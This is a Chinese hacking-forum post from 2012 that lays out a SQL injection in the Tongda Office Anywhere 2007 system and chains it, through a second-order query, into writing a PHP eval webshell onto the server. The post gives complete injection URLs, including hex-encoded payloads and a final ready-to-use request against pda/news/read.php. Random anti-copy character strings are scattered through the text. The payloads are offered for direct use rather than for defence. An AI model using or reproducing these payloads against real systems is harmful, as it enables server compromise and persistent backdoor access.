找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2552|回复: 0
打印 上一主题 下一主题

通达OA2007版本漏洞及getshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-20 08:09:24 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
目前测试通达OA2007版本. N7 g0 N  T0 Z2 f) P
0 `$ R- ]6 h% F+ o
. W4 N  A2 T: O, E& P* f
Office Anywhere 2007 网络智能办公系统4 [% ?: N$ }# q% e6 I

, V1 G' j' c1 d/ t9 W+ B+ B5 {" rhttp://127.0.0.1/pda/news/read.php?P=%cf'    猪点。   暴web目录..
/ o7 L! M( {! U$ a1 w* h( U( y - J* e0 p3 n7 T2 e& G% y/ K
* l: L  h8 u4 K% T$ y
这个时候看了下代码,存在注入的那个变量的语句中第3个字段,在该文件下面被另外个select语句调用了,灵光一闪,大概思路是这样的1 ]* ^4 `; C- T1 v  V( G
* `# U" z% \  H
例如:SELECT * from USER where USER_ID='{$USERNAME}'  2 ~3 U4 A7 ?6 A% T, |
其中有这么段字段声明$PROVIDER = $ROW['PROVIDER'];被下面个语句$query1 = "SELECT * from USER where USER_ID='{$PROVIDER}'";带入查询了% O) Y* t6 x3 M2 E0 k! U

2 F8 U  j& i8 o2 `* ^这个时候我们是不是可以组合起来使用哪?
' d) c0 _/ W, ~6 Q" z& `6 y
% [3 z* f4 X& m) C7 @5 D9 q第一条语句开始注入,union select 1,2,3,4,5,6,7,8,9,10...,比如第3个是PROVIDER字段,我们这样
$ q) a: L' H5 J, _: h+ bunion select 1,2,'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#,4,5,6,7,8,9,10* o" ]. d- b" T4 y0 r. h& ?* t

9 q  [# ^. ?- u5 b2 p/ D这样'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#这个语句就带入第二条语句去写webshell了
6 P0 G4 g* X$ g+ }/ A; g8 n
& `! ?  e* j* ]8 @6 v- J* \那么问题来了,单引号可以吗?当然是不可以的,^_^。。。- o+ B. O2 }# Y8 K' ]

( M8 S& j) y5 f5 b' e. f$ R/ B那么我们用字符串格式带入进行hex编码
; w' n2 ^9 A" u: V! z$ Z( j3 |& @, H$ Y3 A
3 W! x2 m. c! _$ w* z8 z2 \%cf'UNION SELECT 1,2,3,0x27554e494f4e2053454c45435420312c312c312c273c3f706870206576616c282476293b3f3e272c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c3120696e746f2064756d7066696c6527423a2f6d2e7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23* o8 w! h" |1 G4 H

3 A4 m: {7 O; H' P测试ok,获取oa的webshell
2 v* J; ^2 }: T) l: T1 t: Q
, v1 ?- g. s4 r
) f  Z8 Y; X- g" I+ Dpda/news/read.php?P=%cf'or%281=1%29%23&NEWS_ID=%cf'UNION SELECT 1,2,3,0x27554E494F4E2053454C45435420312C312C312C273C3F706870206576616C282476293B3F3E272C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C3120696E746F2064756D7066696C6527443A2F4D594F412F776562726F6F742F6D2E7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23
0 c% ~+ p% u! H9 a直接getwebshell
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表